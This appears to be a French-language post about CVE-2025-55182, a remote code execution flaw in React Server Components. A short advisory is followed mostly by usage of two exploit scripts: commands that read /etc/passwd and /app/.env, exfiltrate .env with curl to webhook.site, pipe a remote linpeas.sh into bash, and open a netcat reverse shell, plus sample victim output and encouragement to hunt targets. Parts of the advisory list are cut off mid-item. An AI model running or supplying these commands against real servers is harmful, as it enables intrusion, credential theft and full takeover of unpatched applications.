CVE-2025-55182
✅ Cela signifie que des attaquants pourraient potentiellement exécuter du code serveur arbitraire avec une seule requête spécialement conçue.
⚠️ Systèmes utilisant React Server Components, notamment :
✅ Paquets React server DOM
✅ Frameworks qui intègrent RSC, tels que :
❌ Non concernés :
🔍 Recherchez les paquets vulnérables transitifs
🧾 Utilisez :
npm auditpnpm audityarn audit⚠️ Ces mesures ne font que réduire le risque — elles ne remplacent PAS le correctif
✅ Développeurs full-stack utilisant Next.js App Router
✅ Équipes DevOps hébergeant des applications React SSR
✅ Ingénieurs sécurité surveillant :
🚨 Si votre application utilise React Server Components et n'est pas corrigée — elle est potentiellement entièrement compromise dès maintenant.
CVE-2025-55182.py (RCE basique)
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py (reverse shell instantané)
# 1. Start listener (once)
nc -lvnp 4444
# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
C'est littéralement tout.
Deux scripts, ces 8 commandes → compromission totale de n'importe quel site Next.js non corrigé aujourd'hui.
Allez chercher ces bounties.
Voici exactement ce que vous verrez en temps réel lorsque l'exploit fonctionne (cible non corrigée à 100 %, 3 déc. 2025) :
1. Lorsque vous exécutez le script RCE normal (CVE-2025-55182.py)
Vous tapez :
./CVE-2025-55182.py https://target.com "whoami"
Vous voyez instantanément à l'écran :
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ Ce « node » (ou tout ce que la commande retourne) est la sortie réelle du serveur victime.
Si vous exécutez id, vous verrez les lignes complètes uid/gid, etc.
2. Lorsque vous exécutez le script reverse shell (CVE-2025-55182-revshell.py)
Vous tapez :
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Vous voyez instantanément sur votre terminal d'écoute :
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ Shell TTY interactif complet en tant qu'utilisateur node (presque toujours l'utilisateur de l'application web). Vous contrôlez la machine.
C'est littéralement tout.
Si vous voyez l'un des éléments ci-dessus → l'exploit a fonctionné à 100 %.
Si vous n'obtenez que HTTP 403/404 ou rien → déjà corrigé ou bloqué par le WAF.
Bonne chasse.
avertissement
Ce PoC est destiné uniquement aux tests de sécurité autorisés et à un usage éducatif.
Ne l'exécutez pas contre un système que vous ne possédez pas ou pour lequel vous ne disposez pas d'une autorisation écrite explicite de test.
Toute utilisation non autorisée est illégale et peut entraîner des poursuites pénales.
Utilisez-le uniquement sur votre laboratoire, des programmes de bug bounty avec un périmètre clair, ou des cibles qui vous ont donné la permission.
Vous êtes 100 % responsable de vos actes.